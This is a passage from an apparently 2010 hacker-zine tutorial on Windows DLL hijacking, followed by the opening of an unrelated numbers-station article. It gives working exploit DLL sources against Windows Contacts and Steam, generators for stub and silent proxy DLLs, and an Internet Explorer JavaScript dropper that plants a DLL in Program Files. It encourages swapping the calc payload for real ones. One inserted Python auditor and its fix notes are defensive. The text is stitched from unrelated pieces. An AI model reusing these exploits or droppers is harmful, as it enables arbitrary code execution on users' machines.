3. The Windows system directory. The GetSystemDirectory function retrieves the path of this
directory.
4. The Windows directory. The GetWindowsDirectory function retrieves the path of this
directory.
5. The directories listed in the PATH environment variable.
When the _spawn*p* and _exec*p* functions are invoked, the following locations are searched for the
requested file:
1. The current working directory (CWD)
2. The 32-bit system directory (Windows\System32)
3. The Windows directory (Windows)
4. The directories in the PATH environment variable
You may have already formulated an idea about what can happen here. If a DLL file is loaded by the
third method (a bare filename with no path), then there is a good chance that the load function
searches a few other directories before finding it. If an attacker places a DLL file containing
malicious code in a directory that is searched before the one holding the real DLL, then it will be
loaded (with the privileges of the calling program) instead of the real DLL, leading to arbitrary
code execution. This is a DLL hijacking attack.
IV. Developing a Proof of Concept
=================================
It is fairly simple to develop a working exploit for DLL hijacking. In this section, I will guide
you through the process of finding a vulnerable application, identifying hijackable DLL files, and
creating your own DLL files to be hijacked. For the scope of this tutorial, I will target
Microsoft's Windows Contacts program (tested on Vista SP2 and 7 Ultimate).
First, download and extract Process Monitor (available at [1]), which we will use to track the
filesystem activity of Windows Contacts. After opening it, add the following filters:
Process Name is wab.exe then Include
Path ends with .dll then Include
Result is NAME NOT FOUND then Include
Doing this restricts the program's output just to what we are interested in (requests to load
nonexistent DLL files by wab.exe).
Create an empty file named "test.wab", where .wab is a file extension associated with Windows
Contacts. Double-click on test.wab, which will open the Windows Contacts program. Scrolling down,
you should see something similar to the following events:
wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\system\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Users\storm\Desktop\New Folder\Windows Contacts\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Perl\site\bin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Perl\bin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\PHP\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wbem\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\WindowsPowerShell\v1.0\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wbin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Nmap\wab32res.dll NAME NOT FOUND
This string of failed attempts to load a single DLL file is what we are looking for. First, the
directory that wab.exe was executed from is checked for wab32res.dll, where it is not found. Next,
it checks three Windows directories, where it is also not found. Then, it checks the current
working directory (where the .wab file was loaded from), and then, finally, it enumerates PATH as a
last resort. By observing this trend, we can assume that the program attempts to load wab32res.dll
using either the LoadLibrary or LoadLibraryEx method.
In case you are interested, by removing the "NAME NOT FOUND" filter, you can see all requests to
load DLL files, successful or not. By doing so, we can see that Windows Contacts was ultimately
successful in loading wab32res.dll a little further down:
wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe QueryBasicInformationFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll FILE LOCKED WITH ONLY READERS
wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe Load Image C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CloseFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
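Reading a trace like this by hand is fine for one DLL; a developer auditing an application before release, or a responder triaging a suspicious load, wants it done for every DLL in the capture. The following is an added example, not code from the article: it parses Process Monitor lines in the text form shown above, records the order in which directory classes were probed for each DLL, checks that order against the search-order tables from section III, and lists the user-writable directories (the CWD and PATH entries) that were consulted before the DLL was actually found. The application directory, CWD and PATH entries are assumptions reconstructed from the trace above, and the operation and result vocabulary recognised by the parser is limited to what appears there.

```python
import re

# Constructed assumptions about the traced process. In a real audit take them
# from Process Monitor's process details: image directory, working directory
# and the PATH the process started with.
APP_DIR = r"C:\Program Files\Windows Mail"
CWD = r"C:\Users\storm\Desktop\New Folder\Windows Contacts"
SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\system", r"C:\Windows")
PATH_DIRS = (r"C:\Perl\site\bin", r"C:\Perl\bin", r"C:\Program Files\PHP",
             r"C:\Windows\System32", r"C:\Windows", r"C:\Windows\System32\wbem",
             r"C:\Windows\System32\WindowsPowerShell\v1.0", r"C:\Windows\wbin",
             r"C:\Program Files\Nmap")

# Search orders from section III, reduced to the directory classes a trace lets
# us recognise ("app" = the directory the executable loaded from).
SEARCH_ORDERS = {
    "LoadLibrary*": ("app", "system", "cwd", "path"),
    "SearchPath/CreateProcess*/LoadModule/WinExec": ("app", "cwd", "system", "path"),
    "ShellExecute*/_spawn*p*/_exec*p*": ("cwd", "system", "path"),
}

# Constructed fixture: the Process Monitor lines printed above, re-typed.
TRACE = r"""
wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\system\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Users\storm\Desktop\New Folder\Windows Contacts\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Windows Mail\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Perl\site\bin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Perl\bin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\PHP\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\wbem\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\System32\WindowsPowerShell\v1.0\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Windows\wbin\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Nmap\wab32res.dll NAME NOT FOUND
wab.exe CreateFile C:\Program Files\Common Files\System\wab32res.dll SUCCESS
wab.exe CreateFileMapping C:\Program Files\Common Files\System\wab32res.dll FILE LOCKED WITH ONLY READERS
wab.exe Load Image C:\Program Files\Common Files\System\wab32res.dll SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<proc>\S+)\s+(?P<op>Load Image|\w+)\s+(?P<path>.+?)\s+"
    r"(?P<result>SUCCESS|NAME NOT FOUND|PATH NOT FOUND|FILE LOCKED WITH ONLY READERS)$")


def parse_trace(text):
    """Yield (process, operation, path, result) for each well-formed line."""
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("proc"), m.group("op"), m.group("path"), m.group("result")


def classify(directory):
    """Map a probed directory to the class it occupies in the search order."""
    d = directory.lower()
    for cls, dirs in (("app", (APP_DIR,)), ("system", SYSTEM_DIRS),
                      ("cwd", (CWD,)), ("path", PATH_DIRS)):
        if d in (x.lower() for x in dirs):
            return cls
    return "other"


def audit_dll_loads(trace_text, process):
    """For each DLL `process` probed: the order in which directory classes were
    tried, the search-order families that order is consistent with, and the
    user-writable directories (CWD, PATH entries) consulted before the DLL was
    found. A non-empty 'exposed_dirs' is the finding a developer has to fix."""
    probes = {}
    for proc, op, path, result in parse_trace(trace_text):
        if proc != process or op != "CreateFile" or not path.lower().endswith(".dll"):
            continue
        directory, _, dll = path.rpartition("\\")
        probes.setdefault(dll.lower(), []).append((classify(directory), directory, result))

    report = {}
    for dll, seq in probes.items():
        order = []
        for cls, _, _ in seq:
            if cls != "other" and cls not in order:
                order.append(cls)
        families = [name for name, full in SEARCH_ORDERS.items()
                    if [c for c in full if c in order] == order]
        exposed = []
        for cls, directory, result in seq:
            if result == "SUCCESS":
                break
            if cls in ("cwd", "path"):
                exposed.append(directory)
        report[dll] = {"order": order, "families": families, "exposed_dirs": exposed}
    return report


if __name__ == "__main__":
    for dll, info in audit_dll_loads(TRACE, "wab.exe").items():
        print(dll, info["order"], info["families"])
        for d in info["exposed_dirs"]:
            print("  probed before found:", d)
```

For the trace above the report reproduces the article's reasoning mechanically: the probe order app, system, cwd, path is consistent only with the LoadLibrary* family, and eight user-writable directories were consulted before the DLL was found. The fix on the application side is to load such a DLL by absolute path, or to remove the CWD and PATH from the search (SetDllDirectory with an empty string, or LoadLibraryEx with LOAD_LIBRARY_SEARCH_SYSTEM32), after which the same audit reports an empty exposed_dirs list.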
So, now that we've identified wab32res.dll as a viable point of attack, the next step is to craft
our own DLL file. Since we've deduced that the DLL is loaded with one of the LoadLibrary functions,
we can rely on the DllMain entry point. According to [2], "When the system starts or terminates a
process or thread, it calls the entry-point function for each loaded DLL using the first thread of
the process. The system also calls the entry-point function for a DLL when it is loaded or unloaded
using the LoadLibrary and FreeLibrary functions." This means that whatever we put in DllMain() runs
the moment the DLL is loaded, before the program has called a single one of its exports.
The following prototype is taken directly from the MSDN page just cited:
BOOL WINAPI DllMain(
__in HINSTANCE hinstDLL,
__in DWORD fdwReason,
__in LPVOID lpvReserved
);
So let's use this code and actually make it do something. The classic proof of concept is to
execute Calculator:
/*
 Exploit Title: Microsoft Windows Contacts DLL Hijacking Exploit (wab32res.dll)
 Date: August 25, 2010
 Author: storm (storm@gonullyourself.org)
 Tested on: Windows Vista SP2
 http://www.gonullyourself.org/
 gcc -shared -o wab32res.dll Contacts-DLL.c
 .contact, .group, .p7c, .vcf, and .wab files are affected.
*/
#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Payload: pop calc, then kill the host process before it gets a chance to
   call any of the exports we didn't bother to provide. */
int hax(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Called by the loader as soon as the DLL is mapped (DLL_PROCESS_ATTACH). */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return TRUE;
}
Here, DllMain() calls hax(), which simply executes calc.exe and exits. Two things worth knowing
before you build on this: DllMain runs while the loader holds its internal lock, so calling anything
that may load further DLLs (WinExec, CreateProcess, most of the Win32 API outside kernel32) is
officially unsupported, even though it works fine for a proof of concept. For a real payload, check
that fdwReason is DLL_PROCESS_ATTACH so the work happens once, and do it on a new thread. In case
you're wondering, you can determine which file extensions are associated with which programs through
Control Panel > Default Programs.
Compile and put your new wab32res.dll in the same directory as any .contact, .group, .p7c, .vcf, or
.wab file. The file can be empty, just as long as it has one of those file extensions. Open the
file, and you should see a Calculator window open. :)
We are done with the proof of concept process for this program. However, the DllMain trick on its
own only works when the DLL is loaded at run time. If the targeted program links against the DLL at
build time instead (implicit linking: the DLL's name sits in the program's import table), the loader
resolves every imported function before it calls anyone's DllMain, and if our DLL is missing one of
them the process dies with an "entry point could not be located" error before our code ever runs.
If this is the case, then we must construct our new DLL file in a different manner. We must create
a stub for every export function provided by the real DLL file, but instead of the actual
functionality, each function simply runs our hax() function.
For this example, I will use rpawinet.dll, which is loaded insecurely by Live! Cam Avatar Creator
(CrazyTalk4 for short). It's essentially some useless program that came pre-installed on my
computer, so I figured I would utilize it somehow.
First, download and extract DLL Export Viewer from [3]. Run the program, and load the DLL file you
wish to examine (in this case, rpawinet.dll). A list of the export functions should display in the
window. Ctrl+A to select all, and Ctrl+S to save to a text file. The contents of the text file
should look something like:
==================================================
Function Name : HttpFilterBeginningTransaction
Address : 0x100011d0
Relative Address : 0x000011d0
Ordinal : 1 (0x1)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterClose
Address : 0x100011dd
Relative Address : 0x000011dd
Ordinal : 2 (0x2)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOnBlockingOps
Address : 0x100011ea
Relative Address : 0x000011ea
Ordinal : 3 (0x3)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOnResponse
Address : 0x100011f7
Relative Address : 0x000011f7
Ordinal : 4 (0x4)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOnTransactionComplete
Address : 0x10001204
Relative Address : 0x00001204
Ordinal : 5 (0x5)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
==================================================
Function Name : HttpFilterOpen
Address : 0x10001211
Relative Address : 0x00001211
Ordinal : 6 (0x6)
Filename : rpawinet.dll
Full Path : C:\Users\storm\Desktop\New Folder\CrazyTalk4\rpawinet.dll
Type : Exported Function
==================================================
Using a simple Perl script, we can enumerate the function names in this text file and output them in
the correct format for our DLL source. The prototype for hax() goes first because the stubs call it
before it is defined, and without it modern gcc refuses to compile the implicit declaration.
use strict;
use warnings;

my $file = shift @ARGV or die "usage: $0 exports.txt\n";
open my $fh, '<', $file or die "$file: $!";

print "#include <windows.h>\n#include <stdlib.h>\n\n";
print "#define DllExport __declspec (dllexport)\n\n";
print "int hax(void);\n\n";    # prototype: the stubs below call hax() before it is defined
while (<$fh>) {
    print "DllExport void $1() { hax(); }\n" if /Function Name\s+: (\w+)/;
}
close $fh;
print "\nint hax(void)\n{\n    WinExec(\"calc\", 0);\n    exit(0);\n    return 0;\n}\n";
This should output:
#include <windows.h>
#include <stdlib.h>

#define DllExport __declspec (dllexport)

int hax(void);

DllExport void HttpFilterBeginningTransaction() { hax(); }
DllExport void HttpFilterClose() { hax(); }
DllExport void HttpFilterOnBlockingOps() { hax(); }
DllExport void HttpFilterOnResponse() { hax(); }
DllExport void HttpFilterOnTransactionComplete() { hax(); }
DllExport void HttpFilterOpen() { hax(); }

int hax(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}
I think you know what to do from here. :)
If you are interested, HD Moore has written a DLL hijacking auditing kit that automates checking
every associated file extension on one's computer to find potential program vulnerabilities. You
can find this tool at [4].
V. Real-World Attack Examples
=============================
There are many avenues for DLL hijacking that turn a number of seemingly safe activities into
potential security threats. I myself will not go too deeply into this section simply because other
articles have done a good job describing the vulnerable scenarios, so I will instead provide a guide
to these resources.
The article "Exploiting DLL Hijack in the real world" at [5] (mirror: [6]) provides a few good
examples of possible attack scenarios. The main points of the article are "Using a SMB/WebDav
shared folder," "A compressed package (.zip, .tar.gz, .rar etc)," "Torrents," and "Exploiting
multiple application hijacks."
The article "New DLL Hijacking Exploits (many!)" at [7] steps through an example WebDAV attack using
Metasploit. "Autorun DLL Hijacker (USB stick)" at [8] attempts to compromise a system through the
AutoRun feature of USB thumb drives.
On another note, we have only covered proof of concept DLLs that don't really do much. Also, since
we are either gutting the export functions or leaving them out altogether, the hijacked program is
going to crash or misbehave the moment it calls one of them; the "exit(0);" line is there precisely
so that it dies quietly instead. Remove it and the crash is what the victim sees.
Let's learn how to execute our payload while still maintaining the functionality of the original DLL
file, effectively creating a silent attack.
We will achieve this through the use of a "proxy DLL." A proxy DLL is exactly what it sounds like -
a DLL file that acts as an intermediary to another DLL file. These are used to intercept and alter
program calls, most commonly to add "extra functionality" to games. For this quick section, I'll be
referencing the article [9] as our method of creating proxy DLL files. The source wrappit.cpp [10]
is provided by the article to automate the process, which you can instead download from [11] to
avoid the mandatory registration bullshit.
As I am still unfamiliar with the true power of proxy DLLs, I will only introduce you to this
concept and recommend you to guide yourself through the process by reading the documentation linked
above. The CodeProject article does a pretty good job explaining how to use the tool. Make sure
that the appropriate development environment is installed (I am using Microsoft Visual C++ Express).
I will use the example wsock32.dll as in the article:
C:\Users\storm\Desktop\src>"C:\Program Files\Microsoft Visual Studio 10.0\VC\bin\vcvars32.bat"
Setting environment for using Microsoft Visual Studio 2010 x86 tools.
C:\Users\storm\Desktop\src>dumpbin /exports C:\Windows\System32\wsock32.dll > exports.txt
C:\Users\storm\Desktop\src>type exports.txt
Microsoft (R) COFF/PE Dumper Version 10.00.30319.01
Copyright (C) Microsoft Corporation. All rights reserved.
Dump of file C:\Windows\System32\wsock32.dll
File Type: DLL
Section contains the following exports for WSOCK32.dll
00000000 characteristics
4A5BC955 time date stamp Mon Jul 13 19:55:01 2009
0.00 version
1 ordinal base
1142 number of functions
75 number of names
ordinal hint RVA name
1141 0 AcceptEx (forwarded to MSWSOCK.AcceptEx)
1111 1 EnumProtocolsA (forwarded to MSWSOCK.EnumProtocolsA)
1112 2 EnumProtocolsW (forwarded to MSWSOCK.EnumProtocolsW)
1142 3 GetAcceptExSockaddrs (forwarded to MSWSOCK.GetAcceptExSockaddrs)
1109 4 GetAddressByNameA (forwarded to MSWSOCK.GetAddressByNameA)
1110 5 GetAddressByNameW (forwarded to MSWSOCK.GetAddressByNameW)
1115 6 GetNameByTypeA (forwarded to MSWSOCK.GetNameByTypeA)
1116 7 GetNameByTypeW (forwarded to MSWSOCK.GetNameByTypeW)
1119 8 GetServiceA (forwarded to MSWSOCK.GetServiceA)
1120 9 GetServiceW (forwarded to MSWSOCK.GetServiceW)
1113 A GetTypeByNameA (forwarded to MSWSOCK.GetTypeByNameA)
1114 B GetTypeByNameW (forwarded to MSWSOCK.GetTypeByNameW)
24 C MigrateWinsockConfiguration (forwarded to MSWSOCK.MigrateWinsockConfiguration)
1130 D NPLoadNameSpaces (forwarded to MSWSOCK.NPLoadNameSpaces)
1117 E SetServiceA (forwarded to MSWSOCK.SetServiceA)
1118 F SetServiceW (forwarded to MSWSOCK.SetServiceW)
1140 10 TransmitFile (forwarded to MSWSOCK.TransmitFile)
500 11 WEP (forwarded to ws2_32.WEP)
102 12 WSAAsyncGetHostByAddr (forwarded to ws2_32.WSAAsyncGetHostByAddr)
103 13 WSAAsyncGetHostByName (forwarded to ws2_32.WSAAsyncGetHostByName)
105 14 WSAAsyncGetProtoByName (forwarded to ws2_32.WSAAsyncGetProtoByName)
104 15 WSAAsyncGetProtoByNumber (forwarded to ws2_32.WSAAsyncGetProtoByNumber)
107 16 WSAAsyncGetServByName (forwarded to ws2_32.WSAAsyncGetServByName)
106 17 WSAAsyncGetServByPort (forwarded to ws2_32.WSAAsyncGetServByPort)
101 18 WSAAsyncSelect (forwarded to ws2_32.WSAAsyncSelect)
108 19 WSACancelAsyncRequest (forwarded to ws2_32.WSACancelAsyncRequest)
113 1A WSACancelBlockingCall (forwarded to ws2_32.WSACancelBlockingCall)
116 1B WSACleanup (forwarded to ws2_32.WSACleanup)
111 1C WSAGetLastError (forwarded to ws2_32.WSAGetLastError)
114 1D WSAIsBlocking (forwarded to ws2_32.WSAIsBlocking)
1107 1E WSARecvEx (forwarded to MSWSOCK.WSARecvEx)
109 1F WSASetBlockingHook (forwarded to ws2_32.WSASetBlockingHook)
112 20 WSASetLastError (forwarded to ws2_32.WSASetLastError)
115 21 WSAStartup (forwarded to ws2_32.WSAStartup)
110 22 WSAUnhookBlockingHook (forwarded to ws2_32.WSAUnhookBlockingHook)
1000 23 WSApSetPostRoutine (forwarded to ws2_32.WSApSetPostRoutine)
151 24 __WSAFDIsSet (forwarded to ws2_32.__WSAFDIsSet)
1 25 accept (forwarded to ws2_32.accept)
2 26 bind (forwarded to ws2_32.bind)
3 27 closesocket (forwarded to ws2_32.closesocket)
4 28 connect (forwarded to ws2_32.connect)
1106 29 dn_expand (forwarded to MSWSOCK.dn_expand)
51 2A gethostbyaddr (forwarded to ws2_32.gethostbyaddr)
52 2B gethostbyname (forwarded to ws2_32.gethostbyname)
57 2C gethostname (forwarded to ws2_32.gethostname)
1101 2D getnetbyname (forwarded to MSWSOCK.getnetbyname)
5 2E getpeername (forwarded to ws2_32.getpeername)
53 2F getprotobyname (forwarded to ws2_32.getprotobyname)
54 30 getprotobynumber (forwarded to ws2_32.getprotobynumber)
55 31 getservbyname (forwarded to ws2_32.getservbyname)
56 32 getservbyport (forwarded to ws2_32.getservbyport)
6 33 getsockname (forwarded to ws2_32.getsockname)
7 34 0000186E getsockopt
8 35 htonl (forwarded to ws2_32.htonl)
9 36 htons (forwarded to ws2_32.htons)
10 37 inet_addr (forwarded to ws2_32.inet_addr)
1100 38 inet_network (forwarded to MSWSOCK.inet_network)
11 39 inet_ntoa (forwarded to ws2_32.inet_ntoa)
12 3A ioctlsocket (forwarded to ws2_32.ioctlsocket)
13 3B listen (forwarded to ws2_32.listen)
14 3C ntohl (forwarded to ws2_32.ntohl)
15 3D ntohs (forwarded to ws2_32.ntohs)
1102 3E rcmd (forwarded to MSWSOCK.rcmd)
16 3F 000017A8 recv
17 40 00001808 recvfrom
1103 41 rexec (forwarded to MSWSOCK.rexec)
1104 42 rresvport (forwarded to MSWSOCK.rresvport)
1108 43 s_perror (forwarded to MSWSOCK.s_perror)
18 44 select (forwarded to ws2_32.select)
19 45 send (forwarded to ws2_32.send)
20 46 sendto (forwarded to ws2_32.sendto)
1105 47 sethostname (forwarded to MSWSOCK.sethostname)
21 48 000018E0 setsockopt
22 49 shutdown (forwarded to ws2_32.shutdown)
23 4A socket (forwarded to ws2_32.socket)
Summary
1000 .data
1000 .reloc
1000 .rsrc
3000 .text
C:\Users\storm\Desktop\src>g++ wrappit.cpp -o wrappit.exe
C:\Users\storm\Desktop\src>wrappit.exe wsock32.dll exports.txt __stdcall C:\\Windows\\System32\\wsock32.dll wsock32.cpp wsock32.def
Wrappit. Copyright (C) Chourdakis Michael
Usage: WRAPPIT <dll> <txt> <convention> <new dll name> <cpp> <def>
==================================================================
Step 1: Parsing exports.txt...
Step 1: 75 exported functions parsed.
------------------------------------------
Step 2: Generating .DEF file wsock32.def...
Step 2: 75 exported functions written to DEF.
------------------------------------------
Step 3: Generating .CPP file wsock32.cpp...
cl : Command line warning D9035 : option 'Wp64' has been deprecated and will be removed in a future release
wsock32.cpp
Creating library wsock32.lib and object wsock32.exp
Generating code
Finished generating code
C:\Users\storm\Desktop\src>
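Wrappit generates C++ stubs that call through to the real DLL. The dumpbin listing above hints at a
lazier way to build the same proxy: almost every export of wsock32.dll is already a forwarder, and a
module-definition (.def) file can forward exports too. The script below is an added example (not
the article's wrappit.cpp, and not Microsoft's code) that turns `dumpbin /exports` output into a
.def file in which every symbol is forwarded: entries dumpbin already shows as forwarders go
straight to their real home, everything else goes to the genuine DLL renamed to sit beside the
proxy. The name wsock32_orig for that renamed copy is an assumption, and the embedded dump is a
constructed excerpt of the listing above.

```python
"""Generate a forwarding .def file for a proxy DLL from `dumpbin /exports` output.

Added example; not the article's wrappit.cpp and not Microsoft's code. It assumes
the column layout dumpbin prints (ordinal, hint, optional RVA, name, and an optional
"(forwarded to MODULE.name)" note). SAMPLE_DUMPBIN is a constructed excerpt of the
wsock32.dll listing. The .def it produces, linked into a DLL that contains nothing
but a DllMain, re-exports every symbol by forwarding it; "wsock32_orig" is an
assumed name for the genuine wsock32.dll renamed and placed next to the proxy.
"""
import re

SAMPLE_DUMPBIN = """\
    ordinal hint RVA      name

       1141    0          AcceptEx (forwarded to MSWSOCK.AcceptEx)
        116   1B          WSACleanup (forwarded to ws2_32.WSACleanup)
        115   21          WSAStartup (forwarded to ws2_32.WSAStartup)
          7   34 0000186E getsockopt
         16   3F 000017A8 recv
         17   40 00001808 recvfrom
         21   48 000018E0 setsockopt
         23   4A          socket (forwarded to ws2_32.socket)

  Summary
"""

# ordinal, hint, [RVA], name, ["(forwarded to X.Y)"]; header and summary lines don't match.
EXPORT_RE = re.compile(
    r"^\s*(?P<ordinal>\d+)\s+(?P<hint>[0-9A-Fa-f]+)\s+"
    r"(?:(?P<rva>[0-9A-Fa-f]{8})\s+)?"
    r"(?P<name>\S+)(?:\s+\(forwarded to (?P<target>\S+)\))?\s*$"
)


def parse_exports(text):
    """Return [(ordinal, name, forward_target_or_None)] in dump order."""
    exports = []
    for line in text.splitlines():
        m = EXPORT_RE.match(line)
        if m:
            exports.append((int(m.group("ordinal")), m.group("name"), m.group("target")))
    return exports


def make_def(library, original, exports):
    """Build the module-definition text.

    Ordinals are preserved because some importers bind by ordinal rather than by
    name; a proxy that renumbers them breaks exactly those callers. Forwarders that
    dumpbin reported are kept as they are, so the proxy never depends on the
    original for those; everything else is forwarded to `original`, which is a
    module name without extension (the loader appends .dll).
    """
    lines = ["LIBRARY %s" % library, "EXPORTS"]
    for ordinal, name, target in exports:
        dest = target if target else "%s.%s" % (original, name)
        lines.append("    %s=%s @%d" % (name, dest, ordinal))
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    import sys
    # Pass a saved `dumpbin /exports` listing as the first argument, or use the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMPBIN
    sys.stdout.write(make_def("wsock32", "wsock32_orig", parse_exports(text)))
```

Link the generated file with a one-function source (just DllMain carrying the payload) using
`cl /LD proxy.c /link /DEF:wsock32.def` or `gcc -shared -o wsock32.dll proxy.c wsock32.def`; the
proxy then has no code paths of its own for the program to notice. Forwarders are resolved through
the same search order as any other load, so the renamed original has to sit where the proxy will
find it, and the same directory is the simplest choice.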
And this is where I will leave you. :)
VI. Omg Hax
===========
Many flaws in web browsers allow files to be written to a victim's computer but not executed
(arbitrary file download), leaving the attacker hoping that the file gets opened, intentionally or
accidentally. With DLL hijacking, exploits such as these no longer have to rely on the user
interacting with the file directly, which is usually where an attack gets noticed. Instead, a
malicious DLL targeting a popular program is dropped into a location that will be searched before
the legitimate DLL is found. Or, as in the case below, where the DLL the program asks for doesn't
exist at all:
/*
 Exploit Title: Steam DLL Hijacking Exploit (steamgamesupport.dll)
 Date: August 25, 2010
 Author: storm (storm@gonullyourself.org)
 Tested on: Windows Vista SP2
 http://www.gonullyourself.org/
 gcc -shared -o steamgamesupport.dll Steam-DLL.c
 For whatever ungodly reason, Steam searches PATH for steamgamesupport.dll but never finds it.
 Shall we help it?
*/
#include <windows.h>
#include <stdlib.h>   /* exit() */

/* Payload: pop calc, then terminate the host before it notices we export nothing. */
int hax(void)
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Runs as soon as the loader maps us from wherever on the search path we were planted. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    hax();
    return TRUE;
}
The following code, provided by SubSyn, acts as a basic example of a file dropper. It will produce
one script warning when executed. The code with no script warnings will remain unreleased. :)
<html>
<head></head>
<body>
<script language="javascript">
    // ActiveXObject only exists in Internet Explorer; the FileSystemObject is what
    // triggers the one script warning mentioned above.
    var fso = new ActiveXObject("Scripting.FileSystemObject");
    var myfile = fso.CreateTextFile("C:\\Program Files\\Steam\\steamgamesupport.dll", true);
    myfile.WriteLine("compiled DLL contents");   // placeholder: a real dropper writes the DLL bytes
    myfile.Close();
    document.location = 'http://www.intel.com';
</script>
</body>
</html>
[1] http://technet.microsoft.com/en-us/sysinternals/bb896645.aspx
[2] http://msdn.microsoft.com/en-us/library/ms682583%28VS.85%29.aspx
[3] http://www.nirsoft.net/utils/dll_export_viewer.html
[4] http://blog.metasploit.com/2010/08/better-faster-stronger.html
[5] http://digitalacropolis.us/?p=113
[6] http://www.exploit-db.com/papers/14813/
[7] http://www.attackvector.org/new-dll-hijacking-exploits-many/
[8] http://www.attackvector.org/autorun-dll-hijacker-usb-stick/
[9] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs.aspx
[10] http://www.codeproject.com/KB/DLL/CreateYourProxyDLLs/src.zip
[11] http://gonullyourself.org/downloads/wrappit.cpp
[12] http://support.microsoft.com/kb/815065
[13] http://www.network-theory.co.uk/docs/gccintro/gccintro_25.html
[14] http://kb.iu.edu/data/akqn.html
[15] http://support.microsoft.com/kb/2389418
[16] http://www.microsoft.com/technet/security/advisory/2269637.mspx
[17] http://support.microsoft.com/kb/2264107
[18] http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf
[19] http://blog.acrossecurity.com/2010/09/binary-planting-goes-exe.html
[20] http://msdn.microsoft.com/en-us/library/ms682425%28VS.85%29.aspx
[21] http://msdn.microsoft.com/en-us/library/ms687393%28VS.85%29.aspx
[22] http://msdn.microsoft.com/en-us/library/ms684183%28VS.85%29.aspx
[23] http://msdn.microsoft.com/en-us/library/20y988d2%28v=VS.80%29.aspx
[24] http://msdn.microsoft.com/en-us/library/431x4c1w%28VS.80%29.aspx
[==================================================================================================]
-=[ 0x07 Numbers Stations FOIA Request
-=[ Author: teh crew
For those who are not familiar with numbers stations:
"Numbers stations (or number stations) are shortwave radio stations of uncertain origin. They
generally broadcast artificially generated voices reading streams of numbers, words, letters
(sometimes using a spelling alphabet), tunes or Morse code. They are in a wide variety of languages
and the voices are usually female, though sometimes male or children's voices are used.
Evidence supports popular assumptions that the broadcasts are used to send messages to spies. This
usage has not been publicly acknowledged by any government that may operate a numbers station, but
in 2001, the United States tried the Cuban Five for spying for Cuba. The group had received and
decoded messages that had been broadcast from a Cuban numbers station.[1] Also in 2001, Ana Belen
Montes, a senior US Defense Intelligence Agency analyst, was arrested and charged with espionage.
The federal prosecutors stated: "Montes communicated with the Cuban Intelligence Service through
encrypted messages and received her instructions through encrypted shortwave transmissions from
